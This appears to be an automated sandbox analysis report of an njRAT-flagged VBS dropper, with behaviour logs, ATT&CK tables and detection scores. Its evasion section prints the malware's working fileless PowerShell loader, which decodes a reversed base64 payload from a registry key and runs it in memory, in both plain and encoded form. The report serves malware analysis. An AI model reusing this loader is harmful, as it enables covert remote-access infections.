                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5094Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4781Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5604Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: powershell.exe, 00000003.00000002.3343374740.000001A9AB3AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded $text = ((Get-ItemProperty HKCU:\Software\NYANxCAT\).NYANxCAT); $text = -join $text[-1..-$text.Length]; [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String($text)).EntryPoint.Invoke($Null,$Null);
                  Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded $text = ((Get-ItemProperty HKCU:\Software\NYANxCAT\).NYANxCAT); $text = -join $text[-1..-$text.Length]; [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String($text)).EntryPoint.Invoke($Null,$Null);Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsAJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc iaakahqazqb4ahqaiaa9acaakaaoaecazqb0ac0asqb0aguabqbqahiabwbwaguacgb0ahkaiabiaesaqwbvadoaxabtag8azgb0ahcayqbyaguaxaboafkaqqboahgaqwbbafqaxaapac4atgbzaeeatgb4aemaqqbuackaowagacqadablahgadaagad0aiaatagoabwbpag4aiaakahqazqb4ahqawwatadealgauac0ajab0aguaeab0ac4atablag4azwb0aggaxqa7acaawwbbahaacabeag8abqbhagkabgbdadoaogbdahuacgbyaguabgb0aeqabwbtageaaqbuac4atabvageazaaoafsaqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajab0aguaeab0ackakqauaeuabgb0ahiaeqbqag8aaqbuahqalgbjag4adgbvagsazqaoacqatgb1agwabaasacqatgb1agwabaapadsa
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc iaakahqazqb4ahqaiaa9acaakaaoaecazqb0ac0asqb0aguabqbqahiabwbwaguacgb0ahkaiabiaesaqwbvadoaxabtag8azgb0ahcayqbyaguaxaboafkaqqboahgaqwbbafqaxaapac4atgbzaeeatgb4aemaqqbuackaowagacqadablahgadaagad0aiaatagoabwbpag4aiaakahqazqb4ahqawwatadealgauac0ajab0aguaeab0ac4atablag4azwb0aggaxqa7acaawwbbahaacabeag8abqbhagkabgbdadoaogbdahuacgbyaguabgb0aeqabwbtageaaqbuac4atabvageazaaoafsaqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajab0aguaeab0ackakqauaeuabgb0ahiaeqbqag8aaqbuahqalgbjag4adgbvagsazqaoacqatgb1agwabaasacqatgb1agwabaapadsaJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 3.2.powershell.exe.1a9bb7b19b8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.powershell.exe.1a9c3610000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.powershell.exe.1a9bb7b19b8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.powershell.exe.1a9c3610000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3382819373.000001A9C3610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3372776875.000001A9BB668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 3.2.powershell.exe.1a9bb7b19b8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.powershell.exe.1a9c3610000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.powershell.exe.1a9bb7b19b8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.powershell.exe.1a9c3610000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3382819373.000001A9C3610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 3.2.powershell.exe.1a9bb7b19b8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.powershell.exe.1a9c3610000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.powershell.exe.1a9bb7b19b8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.powershell.exe.1a9c3610000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3382819373.000001A9C3610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3372776875.000001A9BB668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 3.2.powershell.exe.1a9bb7b19b8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.powershell.exe.1a9c3610000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.powershell.exe.1a9bb7b19b8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.powershell.exe.1a9c3610000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3382819373.000001A9C3610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information221
                  Scripting
                  Valid Accounts1
                  Command and Scripting Interpreter
                  221
                  Scripting
                  11
                  Process Injection
                  1
                  Masquerading
                  OS Credential Dumping1
                  Security Software Discovery
                  Remote Services1
                  Archive Collected Data
                  11
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  21
                  Virtualization/Sandbox Evasion
                  LSASS Memory1
                  Process Discovery
                  Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  PowerShell
                  Logon Script (Windows)Logon Script (Windows)11
                  Process Injection
                  Security Account Manager21
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Deobfuscate/Decode Files or Information
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput Capture3
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                  Obfuscated Files or Information
                  LSA Secrets1
                  File and Directory Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials12
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs61%ReversingLabsScript-WScript.Backdoor.njRAT
                  nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs51%VirustotalBrowse
                  nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs100%AviraVBS/Dldr.Agent.VPK
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  transfer.adttemp.com.br6%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://aka.ms/pscore680%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://crl.v0%URL Reputationsafe
                  http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                  http://transfer.adttemp.com.br6%VirustotalBrowse
                  https://github.com/Pester/Pester1%VirustotalBrowse
                  https://transfer.adttemp.com.br4%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  transfer.adttemp.com.br
